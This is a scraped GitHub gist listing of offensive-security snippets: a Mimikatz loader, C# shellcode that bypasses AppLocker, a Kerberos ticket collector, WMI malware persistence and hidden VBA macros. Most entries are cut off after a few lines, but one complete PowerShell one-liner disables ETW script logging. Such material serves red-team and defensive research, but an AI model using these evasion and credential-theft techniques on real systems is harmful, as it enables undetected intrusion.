Nikhil "SamratAshok" Mittal samratashok
johnjohnsp1
/ Tasks.cs
Created
August 3, 2019 09:55
Almost :) - BulletProof Mimikatz - Load and execute Mimikatz in stordiag.exe.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Text; | |
| using System.IO.Compression; | |
| using System.EnterpriseServices; | |
| using System.Collections.Generic; | |
| using System.Runtime.InteropServices; | |
| using System.Security.Cryptography; | |
| /* |
johnjohnsp1
/ Shellcode.cs
Created
September 13, 2018 13:16
— forked from netbiosX/Shellcode.cs
C# file that contains shellcode and bypasses AppLocker via Assembly Load
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Net; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| /* | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause |
tandasat
/ KillETW.ps1
Last active
August 22, 2025 06:28
Disable ETW of the current PowerShell session
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # This PowerShell command sets 0 to System.Management.Automation.Tracing.PSEtwLogProvider etwProvider.m_enabled | |
| # which effectively disables Suspicious ScriptBlock Logging etc. Note that this command itself does not attempt | |
| # to bypass Suspicious ScriptBlock Logging for readability. | |
| # | |
| [Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0) |
williamknows
/ Invoke-HideVBAModule.psm1
Created
November 6, 2017 06:55
PowerShell cmdlet for hiding VBA modules in Microsoft Office documents
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| .Synopsis | |
| Used to hide VBA modules from the VBA editor in Microsoft Office documents/templates, but still have them contain executable code. | |
| Script created by William Knowles. @william_knows | |
| Technique originally found by Thegrideon Software: https://www.thegrideon.com/vba-internals.html | |
| .Description | |
| This cmdlet facilitates editing the Word/Excel documents/templates to remove references to VBA modules. | |
| For the older compatibility formats you can edit the file directly with a hex editor and remove module references. | |
| For the newer XML formats that use zip files, you need to unzip them, and edit the vbaProject.bin file. |
jaredcatkinson
/ Get-KerberosTicketGrantingTicket.ps1
Last active
July 19, 2025 16:52
Kerberos Ticket Granting Ticket Collection Script and Golden Ticket Detection Tests
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-KerberosTicketGrantingTicket | |
| { | |
| <# | |
| .SYNOPSIS | |
| Gets the Kerberos Tickets Granting Tickets from all Logon Sessions | |
| .DESCRIPTION | |
| Get-KerberosTicketGrantingTicket uses the Local Security Authority (LSA) functions to enumerate Kerberos logon sessions and return their associate Kerberos Ticket Granting Tickets. |
mgeeky
/ WMIPersistence.vbs
Last active
June 1, 2022 12:58
Visual Basic Script implementing WMI Persistence method (as implemented in SEADADDY malware and further documented by Matt Graeber) to make the Macro code schedule malware startup after roughly 3 minutes since system gets up.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' | |
| ' SYNOPSIS: | |
| ' WMI Persistence method as originally presented by SEADADDY malware | |
| ' (https://github.com/pan-unit42/iocs/blob/master/seaduke/decompiled.py#L887) | |
| ' and further documented by Matt Graeber. | |
| ' | |
| ' The scheduled command will be launched after roughly 3 minutes since system | |
| ' gets up. Also, even if the command shall spawn a window - it will not be visible, | |
| ' since the command will get invoked by WmiPrvSE.exe that's running in Session 0. | |
| ' |